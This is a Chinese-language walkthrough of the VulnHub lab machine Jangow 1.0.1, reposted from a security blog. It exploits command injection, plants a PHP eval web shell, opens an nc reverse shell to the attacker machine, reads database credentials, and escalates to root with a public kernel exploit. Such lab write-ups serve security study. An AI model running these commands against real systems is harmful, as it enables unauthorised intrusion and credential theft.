靶机Jangow: 1.0.1
下载地址:http://www.vulnhub.com/entry/jangow-101,754/
靶场ip:192.168.112.135
kali ip:192.168.112.128
扫描端口发现开启了21和80
先看看80
可以看到80是一个web页面,随便瞎点一下看到一个?buscar=
测试一下存在命令执行漏洞
尝试一下反弹shell,一直接收不到,直接写入一句话木马
echo '<?php eval($_POST["a"]);' > a.php
访问一下,白屏了是个好兆头,掏出我们的蚁剑连接
翻一下配置文件找到数据库账号密码
发现用户名跟系统名一样尝试一下登录
登录成功后得到第一个flag
反弹shell
kali先监听端口
然后新建一个php反弹shell文件,访问一下该文件
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.112.128 443 >/tmp/f');?>
反弹成功
使用python升级一下shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
提权
查看一下内核版本
根据系统版本提权
searchsploit ubuntu 4.4.0
使用45010这个试下
上传到目录下
使用gcc运行
运行后生成文件a.out
运行a.out文件成功将权限提升到root
得到flag
原文始发于微信公众号(探幽安全):vulnhub靶场记录 Jangow: 1.0.1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论